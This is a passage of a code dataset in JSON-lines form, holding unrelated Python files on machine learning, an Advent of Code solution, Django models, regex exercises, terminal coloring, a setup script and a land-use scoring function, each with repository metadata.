style_loss.item()))\n\n\nresult = generated_img.squeeze().detach().cpu()\nresult = denormalize_img(result)\nprint(result.shape)\nimg = result * 255\nimg = img.astype(np.uint8)\nimg = Image.fromarray(img)\nimg.save('result.jpg')\nplt.imshow(result)\nplt.show()\n","repo_name":"badranX/neural_style_transfer","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17801361332","text":"import tensorflow as tf\nimport numpy as np\nfrom sklearn.preprocessing import minmax_scale\n#from sklearn.preprocessing import MinMaxScaler\n\n# many to one (과거 6일의 데이터를 기반으로 7일째의 데이터를 예측)\n\ntimesteps = seq_length = 7\ndata_dim = 5\nhidden_dim = 10\noutput_dim = 1 #hidden_size\n\nxy = np.loadtxt('data-02-stock_daily.csv', delimiter=',')\nxy = xy[::-1] #시간순으로 revearse\n#print(xy[0])\n#print('------------')\nxy = minmax_scale(xy) # 데이터 정규화\n#xy = MinMaxScaler().fit_transform(xy) # 데이터 정규화\n#print(xy[0])\n#exit(0)\nx = xy # input=1st~5th\ny = xy[:, [-1]] # output=5th\n#print(x)\n#exit()\n#print(y.shape)\n\ndataX = []\ndataY = []\n\nfor i in range(0, len(y) - seq_length):\n _x = x[i : i + seq_length] #1~7일치의 개시/최고/최저/사이즈/종료 값\n _y = y[i + seq_length] #8일차의 종료값\n #print('X=', _x, \"-> Y=\", 
_y)\n\n dataX.append(_x)\n dataY.append(_y)\n\n\ntrain_size = int(len(dataY) * 0.7)\ntest_size = len(dataY) - train_size\ntrainX = np.array(dataX[0:train_size])\ntestX = np.array(dataX[train_size:len(dataX)])\ntrainY = np.array(dataY[0:train_size])\ntestY = np.array(dataY[train_size:len(dataY)])\n\n# placeholders\nX = tf.placeholder(tf.float32, [None, seq_length, data_dim])\nY = tf.placeholder(tf.float32, [None, 1])\n\n#LSTM Cell\ncell = tf.contrib.rnn.BasicLSTMCell(num_units=hidden_dim, state_is_tuple=True)\ncell = tf.contrib.rnn.MultiRNNCell([cell] * 4, state_is_tuple=True)\noutputs, _state = tf.nn.dynamic_rnn(cell, X, dtype=tf.float32)\n# use only the output of the last timestep for Y_pred\nY_pred = tf.contrib.layers.fully_connected(outputs[:, -1], output_dim, activation_fn=None)\n#print(outputs[:, -1])\n#exit()\n\n#cost function\nloss = tf.reduce_sum(tf.square(Y_pred - Y))\noptimizer = tf.train.AdamOptimizer(0.01)\ntrain = optimizer.minimize(loss)\n\n# training\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nfor i in range(1000):\n _, l, o, p = sess.run([train, loss, outputs, Y_pred], feed_dict={X: trainX, Y: trainY})\n if i % 100 == 0:\n print(\"step={}, loss={}\".format(i, l))\n #print()\n #print(\"real_output={}\\npredict={}\".format(o[0], p[0]))\n\ntestPredict = sess.run(Y_pred, feed_dict={X: testX})\n#print(np.mean(testY - testPredict))\n#accuracy = tf.reduce_mean(tf.cast(tf.equal(Y, predicted), dtype=tf.float32))\n\n\nimport matplotlib.pyplot as plt\nplt.plot(testY)\nplt.plot(testPredict)\nplt.show()","repo_name":"bart2001/machine_learning","sub_path":"lab12/rnn_with_time_series.py","file_name":"rnn_with_time_series.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73743434717","text":"from sys import stdin\nfrom dateutil.parser import parse\n\n\nids = [l.split(']') for l in stdin.read().splitlines()]\ndata = {}\nfor i in ids:\n d = parse(i[0][1:])\n data[d] = i[1].split()[1][1:]\n\nm = 0\nstat = {}\nfor k in sorted(data.keys()):\n if data[k] == \"sleep\":\n m = k.minute\n elif data[k] == \"p\":\n for x in range(m, k.minute):\n stat[g][x] += 1\n else:\n g = int(data[k])\n if not g in stat:\n stat[g] = {x: 0 for x in range(60)}\n\ng = sorted(stat, key=lambda x: sum(stat[x].values()), reverse=True)[0]\nprint(g * max(stat[g], key=stat[g].get))\n\nm = 0\n\nfor g in stat:\n for x in stat[g]:\n if stat[g][x] > m:\n m = stat[g][x]\n mx = x\n mg = g\n\nprint(m, mx, mg, mg*mx)","repo_name":"fnuttplus/advent","sub_path":"2018/04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74350052637","text":"import json\nimport os\n\nfrom src.main import global_log_fields\n\n\ndef log_trace(message, **data):\n log_entry = dict(\n severity=\"TRACE\",\n message=message,\n component=\"transcoding\",\n **data,\n **global_log_fields\n )\n\n print(json.dumps(log_entry))\n\n\ndef log_error(message, error):\n log_entry = dict(\n severity=\"ERROR\",\n message=message,\n error=error,\n component=\"transcoding\",\n file_system=os.listdir(\"/tmp\"),\n **global_log_fields\n )\n\n print(json.dumps(log_entry))\n","repo_name":"hicks927/FuncTranscodeAAC","sub_path":"src/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"15063022110","text":"import tensorflow as tf\nimport numpy as np\n\nconductivity_1 
= 16\nconductivity_2 = 56\nheat_filter_1 = conductivity_1 / 3. * np.asarray([[1., 1., 1.], [1., -8., 1.], [1., 1., 1.]]).reshape(3,3,1,1)\nheat_filter_2 = conductivity_2 / 3. * np.asarray([[1., 1., 1.], [1., -8., 1.], [1., 1., 1.]]).reshape(3,3,1,1)\n\n################\nimport scipy.io as sio\nu1 = sio.loadmat('/home/hope-yao/Downloads/solution_6666.mat')['U1'][0][1:-1,1:-1]\nf1 = sio.loadmat('/home/hope-yao/Downloads/q_6666.mat')['F1'][0][1:-1,1:-1]\n\nf_input = tf.placeholder(tf.float32, shape=(1, 64, 64, 1))\nu_opt = tf.Variable(tf.zeros((1,64,64,1)))\npadded_input = tf.pad(u_opt, [[0, 0], [1, 1], [1, 1], [0, 0]], \"SYMMETRIC\") # convolution with symmetric padding at boundary\nf_pred_opt = tf.nn.conv2d(input=padded_input, filter=heat_filter_1, strides=[1, 1, 1, 1], padding='VALID')\nloss = tf.reduce_mean(tf.abs(f_pred_opt - f_input))\nopt = tf.train.AdamOptimizer(0.1)\ngrads_g = opt.compute_gradients(loss)\napply_gradient_op = opt.apply_gradients(grads_g)\ninit_op = tf.initialize_variables(tf.all_variables())\n\n## training starts ###\nFLAGS = tf.app.flags.FLAGS\ntfconfig = tf.ConfigProto(\n allow_soft_placement=True,\n log_device_placement=True,\n)\ntfconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=tfconfig)\ninit = tf.global_variables_initializer()\nsess.run(init)\n\nloss_val_hist =[]\nx_output_val_hist = []\nfor t in np.linspace(0., 1., 10):\n x_output_val, loss_val, _ = sess.run([u_opt, loss, apply_gradient_op], {f_input:f1.reshape(1,64,64,1)})\n loss_val_hist += [loss_val]\n x_output_val_hist += [x_output_val]\n\nimport matplotlib.pyplot as plt\nplt.figure()\nplt.plot(loss_val_hist)\nplt.figure()\nplt.imshow(x_output_val_hist[-1][0,:,:,0],cmap='hot')\nplt.colorbar()\nplt.show()\n\nprint('done')\n\nimport matplotlib.pyplot as plt\nplt.imshow(f1,cmap='hot')\nplt.colorbar()\nplt.show()\n","repo_name":"ymlasu/FEA-Net","sub_path":"code_testing/inverse_flow.py","file_name":"inverse_flow.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"41383445388","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n\nclass Lesson(models.Model):\n name = models.CharField(\n max_length=250,\n verbose_name='название',\n )\n url_to_video = models.URLField(\n verbose_name='ссылка на видео',\n )\n viewing_duration = models.PositiveIntegerField(\n verbose_name='длительность просмотра',\n )\n last_viewed_date = models.DateTimeField(\n null=True,\n blank=True,\n verbose_name='дата последнего просмотра'\n )\n\n class Meta:\n verbose_name = 'урок'\n verbose_name_plural = 'уроки'\n ordering = ['name']\n\n def __str__(self):\n return self.name\n\n\nclass Product(models.Model):\n name = models.CharField(\n max_length=250,\n verbose_name='название'\n )\n owner = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n verbose_name='владелец',\n )\n lessons = models.ManyToManyField(\n Lesson,\n related_name='products'\n )\n\n class Meta:\n verbose_name = 'продукт'\n verbose_name_plural = 'продукты'\n ordering = ['name']\n\n def __str__(self):\n return self.name\n\n\nclass AccessToProduct(models.Model):\n product = models.ForeignKey(\n Product,\n on_delete=models.CASCADE\n )\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n )\n\n def __str__(self):\n return f\"{self.user} имеет доступ к {self.product}\"\n\n\nclass ViewLesson(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n )\n lesson = models.ForeignKey(\n Lesson,\n 
on_delete=models.CASCADE,\n )\n viewing_time = models.PositiveIntegerField(\n default=0,\n verbose_name='время просмотра',\n\n )\n status = models.BooleanField(\n default=False,\n verbose_name='cтатус',\n )\n\n def __str__(self):\n return (f\"{self.user} просмотрел {self.lesson} \"\n f\"({'Просмотрено' if self.status else 'Не просмотрено'})\")\n\n def update_status(self):\n if int(self.viewing_time) > 0:\n percent_viewed = int((int(self.viewing_time)\n / int(self.lesson.viewing_duration)) * 100)\n self.status = percent_viewed >= 80\n else:\n self.status = False\n self.save()\n","repo_name":"trubnss/test_task","sub_path":"test_task/test_task/product/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"9113753549","text":"import numpy as np \nimport pandas\nimport csv\nfrom collections import Counter\nimport pickle\n\n\ndef modify(d, val):\n\tfor key in d:\n\t\td[key] = round(d[key]/val, 2)\n\nif __name__ == '__main__':\n\n\n\t# data = pandas.read_csv('thresh_2.5_5.csv', delimiter=',', low_memory=False, header= None).as_matrix()\n\tdemo1 = pandas.read_excel('SV1.xlsx').as_matrix()\n\tdemo2 = pandas.read_excel('SV2.xlsx').as_matrix()\n\n\twith open('../../Data/cf/u_dict.pickle', 'rb') as handle:\n\t\tu_dict = pickle.load(handle)\n\n\tfile = open('../../Data/cf/5_k_prototype.txt', 'r') \n\n\tcluster = 0\n\tuser_cluster = {}\n\tcluster_dict = {} #num users in each cluster\n\tsumm = 0\n\tfor line in file:\n\t\tusers = line.split(\" \")\n\t\tcluster_dict[cluster] = len(users)\n\t\tsumm += len(users)\n\t\t# print(str(cluster)+\" \"+str(len(users)))\n\t\tfor i in range(len(users)-1):\n\t\t\tuser_cluster[int(users[i])] = cluster\n\t\tcluster += 1\n\n\n\tnum_clusters = cluster\n\tgend = [Counter() for i in range(num_clusters)]\n\taged = [Counter() for i in range(num_clusters)]\n\tlocd = [Counter() for i in range(num_clusters)]\n\n\n\tcount = 0\n\tfor i in range(demo1.shape[0]):\n\t\tuser = str(demo1[i,1]) #phone number\n\t\tif user not in u_dict:\n\t\t\tcontinue\n\t\tcount += 1\n\t\tcluster = user_cluster[u_dict[user]]\n\t\tgender = demo1[i,3]\n\t\tage = demo1[i,4]\n\t\tloc = demo1[i,6] #location\n\t\tgend[cluster][gender] += 1\n\t\taged[cluster][age] += 1\n\t\tlocd[cluster][loc] += 1 \n\n\tprint(count)\n\tprint(summ)\n\tprint(num_clusters)\n\n\tfor i in range(len(gend)):\n\t\tprint(\"-----------\"+str(i)+\"---------\")\n\t\tmodify(gend[i],sum(gend[i].values()))\n\t\tprint(gend[i])\n\n\n\tprint(\"\\n\\n\")\n\tfor i in range(len(aged)):\n\t\tprint(\"-----------\"+str(i)+\"---------\")\n\t\tmodify(aged[i], sum(aged[i].values()))\n\t\tprint(aged[i])\n\n\tprint(\"\\n\\n\")\n\tfor i in range(len(locd)):\n\t\tprint(\"-----------\"+str(i)+\"---------\")\n\t\tmodify(locd[i], sum(locd[i].values()))\n\t\tprint(locd[i])\n\t# print(gend)\n\t# print(aged)\n\n\n\tpregd = [Counter() for i in range(num_clusters)]\n\tsmalld = [Counter() for i in range(num_clusters)]\n\tchildd = [Counter() for i in range(num_clusters)]\n\n\tcount = 0\n\tfor i in range(demo2.shape[0]):\n\t\tuser = str(demo2[i,1]) #phone number\n\t\tif user not in u_dict:\n\t\t\tcontinue\n\t\tcount += 1\n\t\tcluster = user_cluster[u_dict[user]]\n\t\tpreg = demo2[i,3]\n\t\tsmall_kid = demo2[i,4]\n\t\tchild = demo2[i,5] #child\n\t\tpregd[cluster][preg] += 1\n\t\tsmalld[cluster][small_kid] += 1\n\t\tchildd[cluster][child] += 1 \n\n\tprint(count)\n\tprint(summ)\n\tprint(\"\\n\\n\")\n\tfor i in 
range(len(pregd)):\n\t\tprint(\"-----------\"+str(i)+\"---------\")\n\t\tmodify(pregd[i], sum(pregd[i].values()))\n\t\tprint(pregd[i])\n\n\tprint(\"\\n\\n\")\n\tfor i in range(len(smalld)):\n\t\tprint(\"-----------\"+str(i)+\"---------\")\n\t\tmodify(smalld[i], sum(smalld[i].values()))\n\t\tprint(smalld[i])\n\n\tprint(\"\\n\\n\")\n\tfor i in range(len(childd)):\n\t\tprint(\"-----------\"+str(i)+\"---------\")\n\t\tmodify(childd[i], sum(childd[i].values()))\n\t\tprint(childd[i])\n","repo_name":"muskaankularia/Fair-recommendation-system-","sub_path":"3_data_analysis/demog/demog.py","file_name":"demog.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72556572958","text":"import re\n\npattern = r\"%(?P[A-z][a-z]+)%([^\\|\\$\\%\\.]?)+<(?P\\w+)>([^\\|\\$\\%\\.]?)+\\|(?P\\d+)\\|([^\\|\\$\\%\\.0-9]?)+(?P\\d+\\.?\\d+)\\$\"\ntotal_income = 0\ntext = input()\n\nwhile not text == 'end of shift':\n match = re.match(pattern, text)\n if match:\n x = match.groupdict()\n print(f\"{x['name']}: {x['product']} - {int(x['count']) * float(x['price']):.2f}\")\n total_income += int(x['count']) * float(x['price'])\n\n text = input()\nprint(f'Total income: {total_income:.2f}')\n\n\n\nimport re\n\npattern = r'%(?P[A-Z][a-z]+)%[^\\|\\$\\%\\.]*<(?P[\\w]+)>[^\\|\\$\\%\\.]*\\|(?P\\d+)\\|([^\\|\\$\\%\\.]*?(?P\\d+\\.\\d+|\\d+)\\$)'\n\nTotal_income = 0\nwhile True:\n\n command = input()\n if command == \"end of shift\":\n break\n matches = re.finditer(pattern, command)\n\n for m in matches:\n Total_income += int(m.group('count')) * float(m.group('price'))\n price = int(m.group('count')) * float(m.group('price'))\n print(f\"{m.group('name')}: {m.group('product')} - {price:.2f}\")\nprint(f\"Total income: {Total_income:.2f}\")\n\n\n\n\n\n\n\n# import re\n#\n# pattern = \\\n# \tr\"^(%(?P[A-Z][a-z]+)%).*(<(?P\\w+)>).*\" \\\n# \tr\"(\\|(?P\\d+)\\|)([^\\d]*)((?P\\d+(\\.\\d+)?)\\$)$\"\n# total = 0\n#\n# data = input()\n# while not data == \"end of shift\":\n# \tmatch = re.match(pattern, data)\n# \tif match:\n# \t\tname, product = match.group(\"name\"), match.group(\"product\")\n# \t\tcost = int(match.group(\"count\")) * float(match.group(\"price\"))\n# \t\tprint(f\"{name}: {product} - {cost:.2f}\")\n# \t\ttotal += cost\n# \tdata = input()\n#\n# print(f\"Total income: {total:.2f}\")\n\n\n\n\n\n\n# import re\n#\n#\n# cust_pattern = r'(?<=\\%)([A-Z][a-z]+)(?=\\%)'\n# prod_pattern = r'(?<=\\<)([\\w]+)(?=\\>)'\n# count_pattern = r'(?<=\\|)([\\d]+)(?=\\|)'\n# price_pattern = r'([\\d]+(\\.[\\d]+)?)(?=\\$)'\n# income = 0\n# while True:\n# data = input()\n# if data == 'end of shift':\n# break\n# m_cust = re.search(cust_pattern, data)\n# m_prod = re.search(prod_pattern, data)\n# m_count = re.search(count_pattern, data)\n# m_price = re.search(price_pattern, data)\n# if m_cust and m_prod and m_count and m_price:\n# customer = m_cust.group()\n# product = m_prod.group()\n# count = int(m_count.group())\n# price = float(m_price.group())\n# else:\n# continue\n# total=count*price\n# print(f'{customer}: {product} - {total:.2f}')\n# income += total\n#\n# print(f'Total income: {income:.2f}')","repo_name":"ilto86/SoftUni-Python","sub_path":"Python Fundamentals/More Exercises/Regular_Expressions - More_Exercises/02_SoftUni_Bar_Income.py","file_name":"02_SoftUni_Bar_Income.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} 
+{"seq_id":"35036772728","text":"import os\nimport io\nfrom setuptools import find_packages, setup\n\ndef extract_version():\n \"\"\"\n Extracts version values from the main matplotlib __init__.py and\n returns them as a dictionary.\n \"\"\"\n with open('rodeo/__init__.py') as fd:\n for line in fd.readlines():\n if (line.startswith('__version__')):\n exec(line.strip())\n return locals()[\"__version__\"]\n\n\nsetup(\n name=\"rodeo\",\n # Increase the version in ggplot/__init__.py\n version=extract_version(),\n author=\"Greg Lamp\",\n author_email=\"greg@yhathq.com\",\n url=\"https://github.com/yhat/rodeo/\",\n license=\"BSD\",\n packages=find_packages(),\n package_dir={\"rodeo\": \"rodeo\"},\n package_data={\n \"rodeo\": [\n \"rodeo-ascii.txt\",\n \"static/ace/snippets/*.js\",\n \"static/ace/*.js\",\n \"static/css/*\",\n \"static/fonts/*\",\n \"static/img/*\",\n \"static/js/*.js\",\n \"static/js/lib/*.js\",\n \"static/js/lib/*.map\",\n \"templates/*.html\",\n \"templates/partials/*.html\"\n ]\n },\n description=\"an ide for data analysis in python\",\n # run pandoc --from=markdown --to=rst --output=README.rst README.md\n long_description=io.open(\"README.rst\", encoding='utf8').read(),\n install_requires=[\n \"ipython>=3.0.0\",\n \"Flask>=0.10.1\",\n \"jedi\",\n \"docopt\",\n \"pyzmq>=13\",\n \"markdown2\"\n ],\n classifiers=['Intended Audience :: Science/Research',\n 'Intended Audience :: Developers',\n 'Programming Language :: Python',\n 'Topic :: Software Development',\n 'Topic :: Scientific/Engineering',\n 'Operating System :: Microsoft :: Windows',\n 'Operating System :: POSIX',\n 'Operating System :: Unix',\n 'Operating System :: MacOS',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3'],\n zip_safe=False,\n entry_points={\n 'console_scripts': [\n 'rodeo = rodeo.cli:cmd',\n ]\n }\n)\n\n","repo_name":"jrowen/dcaffe","sub_path":"rodeo/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"15581869675","text":"from ast import ExceptHandler\nimport datetime\nfrom logging import exception\n\n\nclass Employe :\n # Definition du constructeur \n def __init__(self, matricule, nom, prenom, dateNaissance, dateEmbauche, salaireBase):\n self.matricule = matricule\n self.nom = nom\n self.prenom = prenom\n self.dateNaissance = dateNaissance\n self.dateEmbauche = dateEmbauche\n self.salaireBase = salaireBase\n\n # Definition des methodes de la classe Employe\n \n def calcul_Age(self):\n from datetime import datetime\n anneeActuelle = datetime.today().year \n anneeNaissance = datetime.strptime(lireStrNaissance, '%d-%m-%Y').date().year\n age = anneeActuelle - anneeNaissance\n #print(age)\n return age\n\n def calcul_Anciennete(self):\n from datetime import datetime\n anneeActuelle = datetime.today().year\n anneeEmbauche = datetime.strptime(lireStrEmbauche, '%d-%m-%Y').date().year\n anciennete = anneeActuelle - anneeEmbauche\n return anciennete\n\n def calcul_Augmentation(self):\n if self.calcul_Anciennete() < 5:\n augmentation = lireSalaireBase * 0.02\n return augmentation\n elif self.calcul_Anciennete() < 10:\n augmentation = lireSalaireBase * 0.05\n return augmentation\n else :\n augmentation = lireSalaireBase * 0.1\n return augmentation\n\n def afficherEmploye(self):\n print(\" \")\n print(\"*************** INFORMATIONS EMPLOYE *******************\")\n 
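# display each field of the employee record, one per line\n 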
print(\" \")\n \n print(\"- Matricule: \" + str(self.matricule))\n print(\" \")\n\n nomComplet = lireNom.upper() + \" \" + lirePrenom.capitalize()\n print(\"- Nom complet: \" + nomComplet)\n print(\" \")\n\n print('- Age: ' + str(self.calcul_Age()) + ' ans')\n print(\" \")\n\n print('- Anciennete: ' + str(self.calcul_Anciennete()) + ' ans')\n print(\" \")\n\n salaire_total = lireSalaireBase + self.calcul_Augmentation()\n print('- Salaire: ' + str(salaire_total) + ' Euros/an')\n print(\" \")\n\n print('- Augmentation annuelle en fonction anciennete: ' + str(self.calcul_Augmentation()) + ' Euros/an')\n print(\" \")\n \ntry: \n # Entrer les donnees Employe\n lireMatr = str(input(\"Entrez le matricule: \"))\n\n lireNom = str(input(\"Entrez le nom: \"))\n lirePrenom = str(input(\"Entrez le prenom: \")) \n\n from datetime import datetime\n lireStrNaissance = str(input(\"Entrer date de naissance jj-mm-aaaa: \"))\n \n lireStrEmbauche = str(input(\"Entrer date embauche jj-mm-aaaa: \"))\n\n lireSalaireBase = float(input(\"Entrez le salaire de base: \"))\n\n\n # Instanciation de la classe Employe\n myEmploye = Employe(lireMatr, lireNom, lirePrenom, lireStrNaissance, lireStrEmbauche, lireSalaireBase) \n myEmploye.afficherEmploye()\n \n\nexcept Exception as ex:\n print(ex)","repo_name":"damienSop/MonEntreprise_Python","sub_path":"Employe.py","file_name":"Employe.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36481092993","text":"# -*- coding: utf-8 -*-\n##################################################################\n## ##\n## The Legend Of Zelda - A Link to the Rogue ##\n## Un projet de Methode de Developpement (MDD) ##\n## ##\n## Utils.py ##\n## ##\n## LEVEQUE Dorian & ROUE Evan S2P ENIB 22/04/2016 ##\n##################################################################\n\nimport sys\n\ndef goto(x=0, y=0):\n s_x = str(int(x)+1)\n s_y = str(int(y))\n txt = \"\\033[\" + s_y + \";\" + s_x + \"H\"\n sys.stdout.write(txt)\n\ndef write(text, color=\"white\", backgroundColor=\"black\", textForm = []):\n \n # appliquer de la couleur si indique en parametre\n foreground = dict()\n foreground[\"black\"] = 30\n foreground[\"red\"] = 31\n foreground[\"green\"] = 32\n foreground[\"yellow\"] = 33\n foreground[\"blue\"] = 34\n foreground[\"magenta\"] = 35\n foreground[\"cyan\"] = 36\n foreground[\"light gray\"] = 37\n foreground[\"dark gray\"] = 90\n foreground[\"light red\"] = 91\n foreground[\"light green\"] = 92\n foreground[\"light yellow\"] = 93\n foreground[\"light blue\"] = 94\n foreground[\"light magenta\"] = 95\n foreground[\"light cyan\"] = 96\n foreground[\"white\"] = 97\n \n background = dict()\n background[\"black\"] = 40\n background[\"red\"] = 41\n background[\"green\"] = 42\n background[\"yellow\"] = 43\n background[\"blue\"] = 44\n background[\"magenta\"] = 45\n background[\"cyan\"] = 46\n background[\"light gray\"] = 47\n background[\"dark gray\"] = 100\n background[\"light red\"] = 101\n background[\"light green\"] = 102\n background[\"light yellow\"] = 103\n background[\"light blue\"] = 104\n background[\"light magenta\"] = 105\n background[\"light cyan\"] = 106\n background[\"white\"] = 107\n \n for c in foreground : \n if c == color:\n foreColor = str(int(foreground[c]))\n sys.stdout.write(\"\\033[\"+foreColor+\"m\")\n break\n for b in background :\n if b == backgroundColor:\n backColor = str(int(background[b]))\n sys.stdout.write(\"\\033[\"+backColor+\"m\")\n break\n \n # appliquer 
une mise en forme si indique en parametre\n form = dict()\n form[\"bold\"] = 1\n form[\"underline\"] = 4\n \n for i in textForm:\n for f in form:\n if f == i:\n param = str(int(form[f]))\n sys.stdout.write(\"\\033[\"+param+\"m\")\n \n # ecrire dans le terminal:\n sys.stdout.write(text.encode(\"utf-8\"))\n \n # Re-initialisation de la mise en forme et des couleurs\n sys.stdout.write(\"\\033[0m\")\n\n\nif __name__==\"__main__\":\n #Test 1\n\n goto(1,20)\n write(\"test1\\n\", \"red\", \"white\", [\"bold\"])\n \n goto(10,50)\n write(\"test2\\n\", \"blue\", \"light gray\", [\"underline\"])\n \n goto(12,60)\n write(\"test3\\n\", \"green\", \"black\", [\"bold\", \"underline\"])\n \n","repo_name":"Neopibox/MDD","sub_path":"modules/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":3488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32864966184","text":"import numpy as np\r\n\r\ndef analyze(category_arr): \r\n arr_height, arr_width = category_arr.shape[:2]\r\n\r\n response = {\r\n 'criterion': {\r\n 'basic': [],\r\n 'personalize': [], \r\n },\r\n 'classes': [],\r\n 'score': 0\r\n }\r\n\r\n color_classes = [\"도로\", \"주택\", \"아파트\", \"공장\", \"강\", \"논밭\", \"녹지\", \"대형건물\", \"미분류\"]\r\n color_codes = [\"#000000\", \"#ffff00\", \"#965000\",\"#646464\",\"#000096\",\"#00ff00\",\"#007d00\",\"#9696fa\",\"#ffffff\"]\r\n\r\n colors, counts = np.unique(category_arr, return_counts=1)\r\n for idx, x in enumerate(colors):\r\n counts[idx] = 0\r\n\r\n # 10% ~ 90% 사이의 값은 중앙, 그 외는 외곽으로 판정\r\n hmin = arr_height * 0.1\r\n hmax = arr_height * 0.9\r\n wmin = arr_width * 0.1\r\n wmax = arr_width * 0.9\r\n\r\n for h in range(arr_height):\r\n for w in range(arr_width):\r\n if h >= hmin and h <= hmax and w >= wmin and w <= wmax:\r\n i = np.where((colors == category_arr[h][w]))\r\n counts[i[0][0]] += 1\r\n else:\r\n i = np.where((colors == category_arr[h][w]))\r\n counts[i[0][0]] += 0.7\r\n\r\n green_score = 0.0\r\n green_synergy = 0\r\n\r\n factory_road_score = 0.0\r\n convenience_score = 0.0\r\n\r\n house_score = 0.0\r\n house_count = 0\r\n apartment_count = 0\r\n\r\n development_score = 100\r\n\r\n for index, color in enumerate(colors):\r\n count = counts[index]\r\n proportion = (100 * count) / (sum(counts)) # 외곽 픽셀 0.7 반영\r\n ci = int(color)\r\n\r\n response['classes'].append({\"name\" : color_classes[ci] , \"color\": color_codes[ci], \"proportion\" : proportion})\r\n \r\n if(color == 6): # 녹지\r\n green_score += proportion\r\n development_score -= proportion\r\n green_synergy += 1\r\n elif(color == 3): # 공장\r\n factory_road_score -= proportion * 1.25 / 2\r\n elif(color == 7): # 대형건물\r\n if(proportion <= 20):\r\n convenience_score += proportion\r\n else:\r\n convenience_score += 20\r\n elif(color == 0): # 도로\r\n factory_road_score -= proportion * 1.25 / 10\r\n elif(color == 4): # 강\r\n green_score += proportion\r\n development_score -= proportion\r\n green_synergy += 1\r\n elif(color == 1): # 주택\r\n house_count = count\r\n elif(color == 2): # 아파트\r\n apartment_count = count\r\n elif(color == 5): # 논밭\r\n development_score -= proportion\r\n\r\n if(green_synergy == 2): #강 + 녹지 시너지\r\n green_score += 5\r\n\r\n if apartment_count + house_count != 0:\r\n house_score = (100 * apartment_count) / (apartment_count + house_count)\r\n else:\r\n house_score = 0\r\n \r\n response['criterion']['basic'].append({\"name\" : \"편의성 점수\", \"desc\" : \"주변의 대형 건물(관공서 등)의 비율\", \"score\" : convenience_score})\r\n response['criterion']['basic'].append({\"name\" : 
\"공장, 도로 점수\", \"desc\" : \"매연과 소음을 발생시키는 공장과 도로의 비율\", \"score\" : factory_road_score})\r\n response['criterion']['basic'].append({\"name\" : \"녹지, 강 점수\", \"desc\" : \"공기의 질과 정서적 안정에 도움을 주는 녹지와 수변공간의 비율\", \"score\" : green_score})\r\n response['criterion']['personalize'].append({\"name\" : \"주택/아파트 지수\", \"desc\" : \"구역에 주택과 아파트 중 어느 쪽이 많은지의 비율\", \"score\" : house_score})\r\n response['criterion']['personalize'].append({\"name\" : \"개발 지수\", \"desc\" : \"시내와 교외를 판단할 수 있는 개발도 점수\", \"score\" : development_score})\r\n \r\n response['score'] = green_score + factory_road_score + convenience_score\r\n\r\n return response\r\n","repo_name":"skku-capstone-2020-fall-group13/logic","sub_path":"comflogic/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"26628790369","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.transforms as transforms\nfrom matplotlib.lines import Line2D\nfrom matplotlib.patches import Rectangle\nimport seaborn as sns\nsns.set(style=\"whitegrid\")\n\ndf = pd.read_csv('summary_results_3.csv')\nprint(df.head())\ndf['Score'] = df['Score'].str.replace(r'%', r'.0').astype('float') / 100.0\n\n\ng = sns.factorplot(\"Location\",'Score','Configuration',data=df,kind='bar',col='KPI',legend=False)\nax1 = g.axes[0][0]\nax1.axhline(0.88,color='r',ls='-.')\ntrans = transforms.blended_transform_factory(ax1.get_yticklabels()[0].get_transform(), ax1.transData)\nax1.text(0,0.88, \"{:.2f}\".format(0.88), color=\"red\", transform=trans, ha=\"right\", va=\"center\")\nfor label in ax1.get_xticklabels():\n label.set_ha(\"right\")\n label.set_rotation(45)\nax2 = g.axes[0][1]\nax2.axhline(0.48,color='r',ls='-.')\n#trans = transforms.blended_transform_factory(ax2.get_yticklabels()[0].get_transform(), ax2.transData)\nax2.text(0,0.48, \"{:.2f}\".format(0.48), color=\"red\", ha=\"right\", va=\"center\")\nfor label in ax2.get_xticklabels():\n label.set_ha(\"right\")\n label.set_rotation(45)\n\nax3 = g.axes[0][2]\nax3.axhline(0.49,color='r',ls='-.')\n#trans = transforms.blended_transform_factory(ax3.get_yticklabels()[0].get_transform(), ax3.transData)\nax3.text(0,0.49, \"{:.2f}\".format(0.49), color=\"red\", 